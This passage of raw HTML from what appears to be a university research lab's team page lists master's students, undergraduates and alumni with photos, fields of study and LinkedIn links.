style-local-182-c129-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c129-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c130\" class=\"h-global-transition-all h-heading style-850 style-local-182-c130 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c130\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c131\" class=\"h-text h-text-component style-851 style-local-182-c131 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c132\" class=\"h-text h-text-component style-902 style-local-182-c132 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c133\" class=\"style-855 style-local-182-c133 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c134-outer\">\n            <div data-colibri-id=\"182-c134\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c134 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c135\" class=\"d-block style-854 style-local-182-c135 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-1663377340901.jpg\" class=\"wp-image-1657 style-854-image style-local-182-c135-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c135-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c136\" class=\"h-global-transition-all h-heading style-850 style-local-182-c136 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c136\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Shah Md Shahnewaz Sayem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c137\" class=\"h-text h-text-component style-851 style-local-182-c137 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c138\" class=\"h-text h-text-component style-902 style-local-182-c138 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c139\" class=\"style-855 style-local-182-c139 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/shah-md-shahnewaz-sayem-767540154/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c143\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c143 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c155\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c155 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c156-outer\">\n            <div data-colibri-id=\"182-c156\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c156 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c157\" class=\"h-global-transition-all h-heading style-844 style-local-182-c157 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-844 style-local-182-c157\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Undergraduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c144\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c144 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c145-outer\">\n            <div data-colibri-id=\"182-c145\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c145 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c146\" class=\"d-block style-831 style-local-182-c146 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\" class=\"wp-image-1417 style-831-image style-local-182-c146-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c146-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c147\" class=\"h-global-transition-all h-heading style-832 style-local-182-c147 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c147\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Joshua Quiroz</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c148\" class=\"h-text h-text-component style-833 style-local-182-c148 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c149\" class=\"style-835 style-local-182-c149 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c150-outer\">\n            <div data-colibri-id=\"182-c150\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c150 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c151\" class=\"d-block style-831 style-local-182-c151 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\" class=\"wp-image-1417 style-831-image style-local-182-c151-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c151-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c152\" class=\"h-global-transition-all h-heading style-832 style-local-182-c152 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c152\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raiyan</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c153\" class=\"h-text h-text-component style-833 style-local-182-c153 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c154\" class=\"style-835 style-local-182-c154 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c158\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c158 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c209\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c209 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c210-outer\">\n            <div data-colibri-id=\"182-c210\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c210 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c211\" class=\"h-global-transition-all h-heading style-926 style-local-182-c211 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-926 style-local-182-c211\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Alumni</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c159\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c159 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c160-outer\">\n            <div data-colibri-id=\"182-c160\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c160 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c161\" class=\"d-block style-913 style-local-182-c161 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-2.jpg\" class=\"wp-image-1595 style-913-image style-local-182-c161-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c161-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c162\" class=\"h-global-transition-all h-heading style-914 style-local-182-c162 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c162\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sarah Akinola</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c163\" class=\"h-text h-text-component style-915 style-local-182-c163 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c164\" class=\"style-917 style-local-182-c164 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c165-outer\">\n            <div data-colibri-id=\"182-c165\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c165 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c166\" class=\"d-block style-918 style-local-182-c166 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg\" class=\"wp-image-1597 style-918-image style-local-182-c166-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c166-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c167\" class=\"h-global-transition-all h-heading style-914 style-local-182-c167 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c167\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anvith Anand</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c168\" class=\"h-text h-text-component style-915 style-local-182-c168 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c169\" class=\"style-919 style-local-182-c169 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c170-outer\">\n            <div data-colibri-id=\"182-c170\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 